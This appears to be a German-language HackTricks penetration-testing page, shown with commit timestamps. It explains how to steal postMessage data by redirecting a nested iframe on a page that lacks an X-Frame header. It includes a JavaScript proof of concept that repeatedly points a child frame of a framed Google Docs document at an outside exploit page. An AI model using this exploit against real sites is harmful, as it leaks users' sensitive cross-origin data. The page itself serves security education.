hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md

49 lines
3.8 KiB
Markdown
Raw Normal View History

2024-02-10 15:36:32 +00:00
# PostMessage stehlen, indem die Iframe-Position geändert wird
2022-10-13 00:56:34 +00:00
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-10-13 00:56:34 +00:00
2024-02-10 15:36:32 +00:00
* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks als PDF herunterladen**? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)** einreichen.
2022-10-13 00:56:34 +00:00
</details>
2024-02-10 15:36:32 +00:00
## Ändern der Position von Iframes
2022-10-13 00:56:34 +00:00
2024-02-10 15:36:32 +00:00
Laut [**diesem Bericht**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) können Sie, wenn Sie eine Webseite ohne X-Frame-Header in ein Iframe einbinden, das ein weiteres Iframe enthält, **die Position dieses untergeordneten Iframes ändern**.
2022-10-13 00:56:34 +00:00
2024-02-10 15:36:32 +00:00
Zum Beispiel, wenn abc.com efg.com als Iframe enthält und abc.com keinen X-Frame-Header hat, könnte ich mit **`frames.location`** efg.com zu evil.com im Cross-Origin-Modus ändern.
2022-10-13 00:56:34 +00:00
2024-02-10 15:36:32 +00:00
Dies ist besonders nützlich bei **postMessages**, da es möglich ist, wenn eine Seite sensible Daten mit einem **Platzhalter** wie `windowRef.postmessage("","*")` sendet, **die Position des zugehörigen Iframes (untergeordnet oder übergeordnet) zu einer von Angreifern kontrollierten Position zu ändern** und diese Daten zu stehlen.
2022-10-13 00:56:34 +00:00
```html
<html>
2024-02-10 15:36:32 +00:00
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
2022-10-13 00:56:34 +00:00
</html>
```
<details>
2024-02-10 15:36:32 +00:00
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-10-13 00:56:34 +00:00
2024-02-10 15:36:32 +00:00
* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks im PDF-Format** haben? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family).
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com).
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das [hacktricks repo](https://github.com/carlospolop/hacktricks) und das [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)** einreichen.
2022-10-13 00:56:34 +00:00
</details>